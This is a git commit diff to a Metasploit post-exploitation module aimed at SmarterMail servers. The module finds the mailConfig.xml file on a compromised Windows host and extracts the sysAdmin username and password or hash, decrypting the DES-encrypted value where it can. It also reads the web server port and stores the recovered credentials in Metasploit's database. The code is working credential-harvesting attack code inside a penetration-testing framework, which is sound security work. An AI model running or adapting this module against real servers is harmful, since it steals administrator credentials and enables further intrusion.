Update smartermail to use the new cred API

bug/bundler_fix
wchen-r7 2015-06-03 00:48:52 -05:00
parent 9713fe7f99
commit ef0d6490da
1 changed files with 81 additions and 11 deletions

View File

@ -66,15 +66,47 @@ class Metasploit3 < Msf::Post
decipher.update(encrypted) + decipher.final decipher.update(encrypted) + decipher.final
end end
def get_bound_port(data)
port = nil
begin
port = JSON.parse(data)['BoundPort']
rescue JSON::ParserError => e
elog("#{e.class} - Unable to parse BoundPort (#{e.message}) #{e.backtrace * "\n"}")
return nil
end
port
end
def get_remote_drive
@drive ||= expand_path('%SystemDrive%').strip
end
def get_web_server_port
['Program Files (x86)', 'Program Files'].each do |program_dir|
path = %Q|#{get_remote_drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Web Server\\Settings.json|.strip
if file?(path)
data = read_file(path)
return get_bound_port(data)
end
end
return nil
end
# #
# Find SmarterMail 'mailConfig.xml' config file # Find SmarterMail 'mailConfig.xml' config file
# #
def get_mail_config_path def get_mail_config_path
found_path = '' found_path = ''
drive = expand_path('%SystemDrive%').strip
['Program Files (x86)', 'Program Files'].each do |program_dir| ['Program Files (x86)', 'Program Files'].each do |program_dir|
path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip path = %Q|#{get_remote_drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
vprint_status "#{peer} - Checking for SmarterMail config file: #{path}" vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
if file?(path) if file?(path)
found_path = path found_path = path
@ -106,12 +138,47 @@ class Metasploit3 < Msf::Post
end end
username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/) username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/) password = data.scan(/<(sysAdminPassword|sysAdminPasswordHash)>(.+)<\/(sysAdminPassword|sysAdminPasswordHash)>/).flatten[1]
result['username'] = username[1] unless username.nil? result['username'] = username[1] unless username.nil?
result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil?
if password
begin
result['password'] = decrypt_des(Rex::Text.decode_base64(password))
rescue OpenSSL::Cipher::CipherError
result['password'] = password
end
end
result result
end end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
post_reference_name: self.refname,
session_id: session_db_id,
origin_type: :session,
private_data: opts[:password],
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)
create_credential_login(login_data)
end
# #
# Find the config file, extract the encrypted password and decrypt it # Find the config file, extract the encrypted password and decrypt it
# #
@ -131,15 +198,18 @@ class Metasploit3 < Msf::Post
end end
# report result # report result
port = get_web_server_port || 9998 # Default is 9998
user = result['username'] user = result['username']
pass = result['password'] pass = result['password']
print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'" print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
report_auth_info(
:host => r_host, report_cred(
:sname => 'http', ip: r_host,
:user => user, port: port,
:pass => pass, service_name: 'http',
:source_id => session.db_record ? session.db_record.id : nil, user: user,
:source_type => 'vuln') password: pass,
)
end end
end end